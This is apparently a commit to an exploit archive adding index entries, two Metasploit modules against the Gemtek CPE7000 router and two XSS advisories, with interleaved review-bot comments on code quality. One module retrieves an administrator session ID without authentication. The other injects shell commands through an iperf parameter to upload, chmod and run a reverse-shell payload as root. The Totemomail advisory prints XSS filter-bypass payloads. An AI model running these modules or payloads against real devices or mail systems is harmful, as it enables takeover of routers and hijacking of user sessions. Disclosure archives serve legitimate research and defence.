DB: 2016-04-26
9 new exploits:
Totemomail 4.x and 5.x - Persistent XSS
C/C++ Offline Compiler and C For OS - Persistent XSS
Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever (MSF)
Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (MSF)
CompuSource Systems - Real Time Home Banking - Local Privilege Escalation
Linux x64 - Bind Shell Shellcode Generator
PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (MSF)
NationBuilder Multiple Stored XSS Vulnerabilities
Rough Auditing Tool for Security (RATS) 2.3 - Crash PoC
parent 22a4c5d4cc
commit 39fe341c5b
10 changed files with 1019 additions and 0 deletions
@ -35936,3 +35936,12 @@ id,file,description,date,author,platform,type,port
|
|||
39716,platforms/hardware/webapps/39716.py,"Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities",2016-04-21,"Federico Ramondino",hardware,webapps,443
|
||||
39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86_64 - bindshell (Port 5600) - 86 bytes",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0
|
||||
39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (Powershell)",2016-04-21,b33f,windows,local,0
|
||||
39720,platforms/jsp/webapps/39720.txt,"Totemomail 4.x and 5.x - Persistent XSS",2016-04-25,Vulnerability-Lab,jsp,webapps,0
|
||||
39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent XSS",2016-04-25,Vulnerability-Lab,ios,webapps,0
|
||||
39725,platforms/hardware/webapps/39725.rb,"Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever (MSF)",2016-04-25,"Federico Scalco",hardware,webapps,443
|
||||
39726,platforms/hardware/webapps/39726.rb,"Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (MSF)",2016-04-25,"Federico Scalco",hardware,webapps,443
|
||||
39727,platforms/windows/local/39727.txt,"CompuSource Systems - Real Time Home Banking - Local Privilege Escalation",2016-04-25,"Information Paradox",windows,local,0
|
||||
39728,platforms/lin_x86-64/shellcode/39728.py,"Linux x64 - Bind Shell Shellcode Generator",2016-04-25,"Ajith Kp",lin_x86-64,shellcode,0
|
||||
39729,platforms/win32/remote/39729.rb,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (MSF)",2016-04-25,"Jonathan Smith",win32,remote,21
|
||||
39730,platforms/ruby/webapps/39730.txt,"NationBuilder Multiple Stored XSS Vulnerabilities",2016-04-25,LiquidWorm,ruby,webapps,443
|
||||
39733,platforms/linux/dos/39733.py,"Rough Auditing Tool for Security (RATS) 2.3 - Crash PoC",2016-04-25,"David Silveiro",linux,dos,0
|
||||
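Review bot: the new row for 39721 files the C/C++ Offline Compiler advisory as platform `ios`, type `webapps`, port `0`, while the advisory text added in this same commit states that the request method to inject "requires physical device access or access to the share function"; the type and platform should reflect that access requirement rather than a remote web application. The port column is also inconsistent between the two web-interface XSS rows: 39720 (Totemomail, an HTTPS appliance web interface) gets port `0` while 39730 (NationBuilder) gets `443`; pick one convention for web-application entries.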
69
platforms/hardware/webapps/39725.rb
Executable file
@ -0,0 +1,69 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever',
|
||||
'Description' => %q{
|
||||
A vulnerability exists for Gemtek CPE7000 model ID WLTCS-106 which allows
|
||||
unauthenticated remote attackers to retrieve a valid Administrative SID.
|
||||
|
||||
To obtain an administrative web session inject this SID in your client's
|
||||
cookie with values as follow: userlevel=2;sid=<SID>
|
||||
|
||||
Tested on Hardware version V02A and Firmware version 01.01.02.082.
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
[ 'EDB', '39716' ],
|
||||
[ 'URL', 'http://www.mentat.is/docs/cpe7000-multiple-vulns.html' ],
|
||||
[ 'URL' , 'http://www.gemtek.com.tw/' ]
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
'Federico Scalco <fscalco [ at] mentat.is>'
|
||||
#Based on the exploit by Federico Ramondino <framondino [at ] mentat.is>
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'DisclosureDate' => "Apr 07 2016",
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'RPORT' => 443
|
||||
}
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new("TARGETURI", [true, 'The base URI to target application', '/']),
|
||||
OptBool.new('SSL', [true, 'Use SSL', true])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run
|
||||
@peer = "#{rhost}:#{rport}"
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => '/cgi-bin/sysconf.cgi',
|
||||
'vars_get' => {
|
||||
'page' => 'ajax.asp',
|
||||
'action' => 'login_confirm'
|
||||
}
|
||||
})
|
||||
|
||||
if !res or res.code != 200
|
||||
fail_with(Failure::UnexpectedReply, "Server did not respond in an expected way")
|
||||
end
|
||||
|
||||
ssid = res.body.split(',', 2)
|
||||
print_good("#{@peer} - Valid root SID retrieved: #{ssid[1]}")
|
||||
end
|
||||
end
|
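Review bot: `ssid = res.body.split(',', 2)` followed by `print_good(... #{ssid[1]})` never checks that the split produced two fields, so a 200 response whose body contains no comma (an error page, a different firmware build) prints `Valid root SID retrieved:` with an empty value and reports success; test `ssid.length == 2` and otherwise call `fail_with(Failure::UnexpectedReply, ...)` the way the preceding non-200 check already does. Minor: the description speaks of an "Administrative SID" while the output says "root SID", so one term should be used throughout, and `OptBool.new('SSL', ...)` re-registers an option that `Msf::Exploit::Remote::HttpClient` already provides; `'SSL' => true` belongs in `DefaultOptions` next to `RPORT`.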
231
platforms/hardware/webapps/39726.rb
Executable file
@ -0,0 +1,231 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution',
|
||||
'Description' => %q{
|
||||
A vulnerability exists for Gemtek CPE7000 model ID WLTCS-106
|
||||
exposing Iperf tool to unauthenticated users. Injecting a
|
||||
command in the perf_measure_server_ip parameter, an attacker
|
||||
can execute arbitrary commands. Since the service runs as root,
|
||||
the remote command execution has the same administrative privileges.
|
||||
The remote shell is obtained uploading the payload and executing it.
|
||||
A reverse shell is preferred rather then a bind one, since firewall
|
||||
won't allow (by default) incoming connections.
|
||||
|
||||
Tested on Hardware version V02A and Firmware version 01.01.02.082.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Federico Scalco <fscalco [ at] mentat.is>'
|
||||
#Based on the exploit by Federico Ramondino <framondino [at ] mentat.is>
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'EDB', '39716' ],
|
||||
[ 'URL', 'http://www.mentat.is/docs/cpe7000-multiple-vulns.html' ],
|
||||
[ 'URL' , 'http://www.gemtek.com.tw/' ]
|
||||
],
|
||||
'DisclosureDate' => 'Apr 07 2016',
|
||||
'Privileged' => false,
|
||||
'Platform' => %w{ linux },
|
||||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Linux arm Payload',
|
||||
{
|
||||
'Arch' => ARCH_ARMLE,
|
||||
'Platform' => 'linux'
|
||||
}
|
||||
],
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'RPORT' => 443,
|
||||
'SHELL' => '/bin/sh'
|
||||
}
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptInt.new('CMD_DELAY', [false, 'Time that the Handler will wait for the incoming connection', 15]),
|
||||
OptInt.new('CHUNKS_DELAY', [false, 'Timeout between payload\'s chunks sending requests', 2]),
|
||||
OptString.new('UPFILE', [ false, 'Payload filename on target server, (default: random)' ]),
|
||||
OptInt.new('CHUNK_SIZE', [ false, 'Payload\'s chunk size (in bytes, default: 50)', 50 ]),
|
||||
OptBool.new('SSL', [true, 'Use SSL', true])
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def request_resource(resname)
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'uri' => resname,
|
||||
'method' => 'GET',
|
||||
})
|
||||
return res
|
||||
rescue ::Rex::ConnectionError
|
||||
vprint_error("#{@rhost}:#{rport} - Failed to connect to the web server")
|
||||
return nil
|
||||
end
|
||||
end
|
||||
|
||||
def cleanup
|
||||
print_status("#{@rhost}:#{rport} - Cleanup fase, trying to remove traces...")
|
||||
|
||||
begin
|
||||
clean_target(@upfile)
|
||||
rescue
|
||||
vprint_error("#{@rhost}:#{rport} - Failed to clean traces (/www/#{@upfile}). The resource must be removed manually")
|
||||
end
|
||||
return
|
||||
end
|
||||
|
||||
def clean_target(resname)
|
||||
res = request_resource(resname)
|
||||
if res and res.code != 404
|
||||
print_status("#{rhost}:#{rport} - Found resource " + resname + ". Cleaning up now")
|
||||
#remove
|
||||
cmd = '"; rm /www/' + resname +' &> /dev/null #'
|
||||
res = act(cmd, "deleting resource")
|
||||
if (!res)
|
||||
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to delete resource /www/#{resname} (have to do it manually)")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def set_conditions(buffer)
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => '/cgi-bin/sysconf.cgi',
|
||||
'encode_params' => true,
|
||||
'vars_get' => {
|
||||
'page' => 'ajax.asp',
|
||||
'action' => 'save_iperf_value',
|
||||
'perf_measure_server_ip' => buffer,
|
||||
'perf_measure_server_port' => '5555',
|
||||
'perf_measure_cpe_port' => '5554',
|
||||
'perf_measure_test_time' => '60',
|
||||
'perf_measure_protocol_type' => '1',
|
||||
'perf_measure_packet_data_length' => '1024',
|
||||
'perf_measure_bandwidth' => '19m',
|
||||
'perf_measure_client_num' => '1'
|
||||
}
|
||||
})
|
||||
|
||||
if !res or res.code != 200
|
||||
fail_with(Failure::UnexpectedReply, "Server did not respond in an expected way to set_condition request")
|
||||
end
|
||||
|
||||
return res
|
||||
end
|
||||
|
||||
def toggle_once
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => '/cgi-bin/sysconf.cgi',
|
||||
'vars_get' => {
|
||||
'page' => 'ajax.asp',
|
||||
'action' => 'perf_measure_status_toggle'
|
||||
}
|
||||
})
|
||||
|
||||
if !res or res.code != 200
|
||||
fail_with(Failure::UnexpectedReply, "Server did not respond in an expected way to toggle request")
|
||||
end
|
||||
|
||||
if res.body == "1"
|
||||
@retoggled = false
|
||||
return true
|
||||
elsif !@retoggled
|
||||
#print_status("#{@rhost}:#{rport} - First toggle request returned 0, retoggling now...")
|
||||
@retoggled = true
|
||||
toggle_once()
|
||||
else
|
||||
fail_with(Failure::UnexpectedReply, "Toggler cgi did not respond in an expected way")
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def act(buffer, step)
|
||||
set_conditions(buffer)
|
||||
res = toggle_once()
|
||||
return res
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
@retoggled = false;
|
||||
@cmd_delay = datastore['CMD_DELAY'] || 15
|
||||
@chunk_size = datastore['CHUNK_SIZE'] || 50
|
||||
@rhost = datastore['RHOST']
|
||||
@rport = datastore['RPORT']
|
||||
@upfile = datastore['UPFILE'] || rand_text_alpha(8+rand(8))
|
||||
chunk_delay = datastore['CHUNKS_DELAY'] || 2
|
||||
|
||||
clean_target(@upfile)
|
||||
|
||||
pl = payload.encoded_exe
|
||||
chunks = pl.scan(/.{1,#{@chunk_size}}/)
|
||||
hash = Hash[chunks.map.with_index.to_a]
|
||||
|
||||
print_status("Total payload chunks: " + chunks.length.to_s )
|
||||
print_status("#{rhost}:#{rport} - Uploading chunked payload on the gemtek device (/www/#{@upfile})")
|
||||
|
||||
for chk in chunks
|
||||
chind = hash[chk]
|
||||
safe_buffer = chk.each_byte.map { |b| '\x' + b.to_s(16) }.join
|
||||
|
||||
if chind == 0
|
||||
s_redir = '>'
|
||||
else
|
||||
s_redir = '>>'
|
||||
end
|
||||
|
||||
cmd = '"; printf \'' + safe_buffer + '\' ' + s_redir + ' /www/' + @upfile + ' #'
|
||||
|
||||
print_status("#{@rhost}:#{rport} - Uploading chunk " + (chind + 1).to_s + "/" + chunks.length.to_s + ('.' * (chind + 1)))
|
||||
res = act(cmd, "uploading shell")
|
||||
if (!res)
|
||||
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
|
||||
end
|
||||
select(nil, nil, nil, chunk_delay)
|
||||
end
|
||||
|
||||
#chmod request
|
||||
cmd = '"; chmod 777 /www/' + @upfile + ' & #'
|
||||
print_status("#{rhost}:#{rport} - Asking the gemtek device to chmod #{@upfile}")
|
||||
res = act(cmd, "chmodding payload")
|
||||
if (!res)
|
||||
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to chmod payload")
|
||||
end
|
||||
|
||||
select(nil, nil, nil, @cmd_delay)
|
||||
|
||||
#phone home
|
||||
cmd = '"; /www/' + @upfile + ' & #'
|
||||
print_status("#{rhost}:#{rport} - Asking the gemtek device to execute #{@upfile}")
|
||||
res = act(cmd, "executing payload")
|
||||
if (!res)
|
||||
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
||||
end
|
||||
|
||||
select(nil, nil, nil, @cmd_delay)
|
||||
|
||||
end
|
||||
end
|
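Review bot: `'Privileged' => false` contradicts the module description, which says the service runs as root so the command execution "has the same administrative privileges"; if the payload really runs as root the metadata should be `'Privileged' => true`, otherwise the description overstates the impact. Smaller points in the same hunk: `act(buffer, step)` never uses its `step` argument although every caller passes one ("uploading shell", "chmodding payload", ...), so either drop it or include it in the `fail_with` messages; status messages mix `#{@rhost}` and `#{rhost}` for the same value; `OptBool.new('SSL', ...)` duplicates an option `HttpClient` already registers; and "Cleanup fase" should read "Cleanup phase".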
169
platforms/ios/webapps/39721.txt
Executable file
@ -0,0 +1,169 @@
|
|||
Document Title:
|
||||
===============
|
||||
C & C++ for OS - Filter Bypass & Persistent Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
http://www.vulnerability-lab.com/get_content.php?id=1825
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2016-04-14
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
1825
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
3.5
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
This is an ios c app,you can learn,run,share c code. The software is a offline compiler for developers with apple iOS.
|
||||
Code templates,the contents of the new file is copy from contents of the template file.
|
||||
|
||||
(Copy of the Homepage: https://itunes.apple.com/us/app/c-for-os-programming-language/id1016290003 )
|
||||
|
||||
|
||||
This is an ios c/c++ app,you can learn,run,share c/c++ code. In(the built-in browser or the txt editor),Select the text to run.
|
||||
Code templates,the contents of the new file is copy from contents of the template file.
|
||||
|
||||
(Copy of the Homepage: https://itunes.apple.com/us/app/c-c++-offline-compiler-for/id1016322367 )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The vulnerability laboratory core research team discovered an application-side validation vulnerability in the official C & C++ for OS web-application (api).
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2016-04-14: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
XiaoWen Huang
|
||||
Product: C for OS & C++ - Mobile API (Web-Application) 1.2
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Medium
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A persistent input validation and mail encode web vulnerability has been discovered in the official C & C++ for OS web-application (api).
|
||||
The persistent web vulnerability allows an attacker to inject malicious script codes on the application-side of the vulnerable modules context.
|
||||
|
||||
The basic validation of the code formular and mask allows to include any type of script codes or programming language without offensive input
|
||||
restrictions. Attackers can inject code to a project to share it with another source. In the moment the code of the project is generated to as
|
||||
email body, a persistent script code execution occurs.
|
||||
|
||||
There are two options to exploit, first is to send the malicious mail to the author of the program by the `Mail Author` function. Another possibility
|
||||
to execute code in the email body context is to share it with another code editor by email. In both email body message context the injected wrong
|
||||
filtered script code execution occurs. The internal encoding of the formular is correctly done but in case of sharing by qr or via message body email
|
||||
the execution occurs. The vulnerability is located on the application-side of the iOS application and the request method to inject requires physical
|
||||
device access or access to the share function. The bug is present in the C & C++ for OS 1.2 version of the mobile client. Attackers can for example
|
||||
generate a QR code with malicious context that is executed in the message body were the code is mainly displayed by the iOS application.
|
||||
|
||||
The security risk of the application-side vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5.
|
||||
Exploitation of the persistent vulnerability requires a low privileged ios device user account with restricted access and low user interaction.
|
||||
Successful exploitation of the vulnerabilities results in persistent phishing mails, session hijacking, persistent external redirect to malicious
|
||||
sources and application-side manipulation of affected or connected module context.
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] Share to Authors
|
||||
[+] Share by Email
|
||||
[+] Share via QR Code
|
||||
|
||||
Vulnerable Function(s):
|
||||
[+] Console
|
||||
[+] C or C++
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The persistent vulnerability and mail encoding bug can be exploited by remote attackers with low privileged device user account and low user interaction.
|
||||
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
Manual steps to reproduce the vulnerability ...
|
||||
1. Install the perl app to your apple iOS device
|
||||
2. Start the mobile application
|
||||
3. Include to the first variable in the demo code java or html script code and save the entry as c or c++ script
|
||||
4. Open the saved entry again and click the top right arrow menu
|
||||
5. Now choose Create QR or Share menu button
|
||||
6. Open the menu `Mail to Author` or push the default `iOS Mail App` button
|
||||
7. Now the code of the formular gets transfered to the email message body context
|
||||
Note: The encoding does not parse or encode any inserted values
|
||||
8. The email arrives to the target inbox
|
||||
9. Open the email and the code executes directly in the message body or next to the generated qr code
|
||||
10. Successful reproduce of the filter and validation vulnerability in the c and c++ app api!
|
||||
|
||||
Note: The bug can be exploited by sending to the author, by sending to another target mail or by transfer of a qr code.
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
The vulnerability can be patched by a secure parse and encode of the vulnerable message body context.
|
||||
Filter and parse all code values that are included to the message body. Configure the code to plain text not html to prevent
|
||||
further persistent injection attacks. In case of emergency use the escape function to separate the mechanism permanently.
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of the application-side mail encode web vulnerability in the mobile application api is estimated as medium. (CVSS 3.5)
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied,
|
||||
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage,
|
||||
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised
|
||||
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
|
||||
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
|
||||
|
||||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||||
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
||||
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically
|
||||
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or
|
||||
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific
|
||||
authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.
|
||||
|
||||
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||
SERVICE: www.vulnerability-lab.com
|
||||
CONTACT: research@vulnerability-lab.com
|
||||
|
||||
|
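Review bot: step 1 of the PoC says "Install the perl app to your apple iOS device", but this advisory covers the C/C++ Offline Compiler and C for OS apps, so the line looks carried over from another advisory and should name the product actually under test. "Exploitation Technique: Remote" also sits uneasily with the technical description, which states that the request method to inject "requires physical device access or access to the share function"; the classification should match the described access requirement.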
179
platforms/jsp/webapps/39720.txt
Executable file
@ -0,0 +1,179 @@
|
|||
Document Title:
|
||||
===============
|
||||
Totemomail v4.x & v5.x - Filter Bypass & Persistent Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
http://www.vulnerability-lab.com/get_content.php?id=1769
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2016-04-08
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
1769
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
3.8
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
totemomail® Encryption Gateway protects your email communication with customers and business partners whereas
|
||||
totemomail Internal Encryption secures your internal email traffic. In combination, they become the innovative and potent
|
||||
hybrid encryption solution totemomail Hybrid Encryption. totemomail Encryption Gateway features a high level of security and
|
||||
it is easy for end users and administrators alike to use. The everyday user will have no need to think about encryption because
|
||||
the software is based on a high level of automation.
|
||||
|
||||
(Copy of the Vendor Homepage: http://www.totemo.com/products/mail/overview/introduction/ )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The Vulnerability Laboratory Core Research Team discovered an application-side vulnerability and a
|
||||
filter bypass issue in the Totemo Email Gateway v4.0 b1343 and v5.0 b512 appliance series .
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2016-02-26: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
|
||||
2016-02-27: Vendor Notification (Totemomail Security Team)
|
||||
2016-02-30: Vendor Response/Feedback (TotemomailSecurity Team)
|
||||
2016-03-11: Vendor Fix/Patch (Totemomail Developer Team)
|
||||
2016-04-13: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Medium
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A persistent input validation web vulnerability and a filter bypass issue has been discovered in the official Totemo Email Gateway v4.0 b1343 and v5.0 b512 appliance series .
|
||||
The filter bypass issue allows an attacker to evade the controls of a protection or restriction mechanism to compromise further web module context or service functions.
|
||||
The persistent validation vulnerability allows an attacker to inject own malicious script codes on the application-side of the vulnerable web-application module context.
|
||||
|
||||
The persistent input validation web vulnerability has been discovered in the `Betreff(Subject)` and `Message (Body)` input fields of the `Neue Nachricht (New Message)` module.
|
||||
The attacker can inject malicious script codes to the message body or subject input field. After the inject of the non exectuable context is get send to another manager by
|
||||
secure mail interaction. After the arrival of the message the receiver clicks to `save as html`. In the moment the encoded mail context is generated as html, the malicious
|
||||
injected tag is getting visible as executable context. The injection point of the vulnerability are the `subject` and `message body` input fields and the execution point
|
||||
occurs in the moment the target manager generated the message as html to review or print.
|
||||
|
||||
The regular filter mechanism and validation does not allow to inject for example iframes and basic script code tags like script, iframe, div to the web input forms. As far as
|
||||
an payload is included to for example the subject as listing the validation parses and encodes the string and show only the first two characters. We figured out that is possible
|
||||
to bypass by usage of `img` script code tags with onload alert. The encoding of the input needs to be restricted permanently against special char inputs, the validation procedure
|
||||
needs to parse and encode the input without extending the entry with a null location entry.
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] Posteingang - Nachricht
|
||||
|
||||
Vulnerable Input(s):
|
||||
[+] Subject (Betreff)
|
||||
[+] Message Body (Nachricht)
|
||||
|
||||
Affected Module(s):
|
||||
[+] Message Index (main.jsp)
|
||||
[+] Save as Html (Als HTML Speichern)
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The vulnerability can be exploited by remote attackers with low privileged web-application user account and low user interaction.
|
||||
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
1.1
|
||||
Manual steps to reproduce the vulnerability ...
|
||||
1. Open a new message
|
||||
2. Include any random demo text first
|
||||
3. Include now at least in the message body the script code payloads
|
||||
4. Scroll above back to the subject and include the same payload to the subject input field
|
||||
5. Save the entry as draft
|
||||
6. You can now already see that the service attached to the script code another alt value
|
||||
Note: "><img src="x" alt="null"> "><"<img src="x" alt="null">%20%20> ...
|
||||
7. Now you send the message directly to a manager for reply
|
||||
8. The manager received the message and treid to review it as html
|
||||
9. The execution occurs in the subject and the message body of the html file
|
||||
Note: The html file is wrong encoded and does not parse the values again next to generating the html source file
|
||||
10. Successful reproduce of the filter bypass issue and persistent vulnerability!
|
||||
|
||||
|
||||
PoC: Filter Bypass
|
||||
"><"<img src="x">%20%20>"<iframe src=a>%20<iframe>
|
||||
"><img src=x onerror=prompt(23);>
|
||||
>"<<img src="c" onerror=alert(1)>
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
The vulnerability can be patched by a secure filter and parse of img onload alert script code tags that actually can bypass the filter validation of the Betreff input fields.
|
||||
After that encode and parse the print function that stream the context in html format were the execution point occurs finally.
|
||||
Restrict the input finally and disallow usage of special chars in the subject input field to prevent persistent script code injection attacks.
|
||||
In the second step a secure validation of the pgp key filename (email|preeshare) and input is required to secure encode the vulnerable email and name value of the certificate file.
|
||||
Re-encode the editor text values to no get obviously broken format context back like demonstrated in the picture.
|
||||
|
||||
Fix (temp): Do not open email via save as function in html to prevent exploitation of the issue.
|
||||
|
||||
Totemo AG: The vulnerability is already patched in the newst version of the appliance web-application to protect customers.
|
||||
The update can be processed automatically or by manual interaction with the web-service.
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of the filter bypass issue and application-side input validation encoding vulnerability in the totemomail Hybrid Encryption appliance web-application.
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (research@vulnerability-lab.com) [www.vulnerability-lab.com]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage,
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific
authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.

Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
